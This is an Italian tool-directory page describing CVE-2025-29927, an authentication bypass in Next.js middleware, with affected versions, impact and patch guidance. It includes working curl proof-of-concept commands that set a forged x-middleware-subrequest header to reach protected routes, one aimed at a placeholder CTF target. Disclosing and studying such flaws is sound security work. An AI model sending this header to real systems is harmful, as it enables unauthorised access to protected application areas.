Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-29927 | Kitploit
Strumenti/GitHubGitHub/toddkk02/cve-2025-29927
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàEvasione IDS/IPSSfruttamento di Applicazioni WebCTFPenetration Testing
GitHubtoddkk02/cve-2025-29927

CVE-2025-29927

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-29927 — Bypass di Autenticazione del Middleware di Next.js

Panoramica

Immagina un buttafuori davanti al club, ma se gli dici "Sono già dentro", ti lascia passare senza controllare. Questo è esattamente ciò che è CVE-2025-29927.

Il middleware in Next.js viene eseguito prima che una richiesta venga elaborata, rendendolo il luogo ideale per gestire l'autenticazione. Next.js utilizza un header interno x-middleware-subrequest per prevenire richieste ricorsive ed evitare loop infiniti. Questa vulnerabilità dimostra che è possibile bypassare o saltare completamente l'esecuzione del middleware — inclusi i controlli di sicurezza critici come l'autenticazione prima di raggiungere una route protetta.


Versioni Affette

BranchCorretto in
15.x< 15.2.3
14.x< 14.2.25
13.x< 13.5.9

Applicazioni vulnerabili

  • Applicazioni che ospitano Next.js e utilizzano middleware
  • Applicazioni che si affidano al middleware per l'autenticazione e i controlli di sicurezza senza convalidare successivamente nello stack dell'applicazione

Non affette

  • Applicazioni ospitate su Vercel
  • Applicazioni ospitate su Netlify
  • Applicazioni pubblicate come esportazioni statiche (il middleware non viene eseguito)

Impatto

Migliaia o milioni di applicazioni vengono eseguite su versioni di Next.js non corrette. Se non mitigata, questa vulnerabilità consente l'accesso non autenticato a route protette da chiunque — nessuna credenziale richiesta.


Prova di Concetto

root@kitploit:~
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/private-area

La risposta restituisce la pagina protetta senza alcuna autenticazione.

Ho sfruttato questa vulnerabilità in un ambiente CTF reale

root@kitploit:~
curl -s "http://<target>/<private-area>" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"

Correzione

Aggiorna Next.js a una versione corretta:

  • 15.x → 15.2.3 o superiore
  • 14.x → 14.2.25 o superiore
  • 13.x → 13.5.9 o superiore
Scarica lo strumento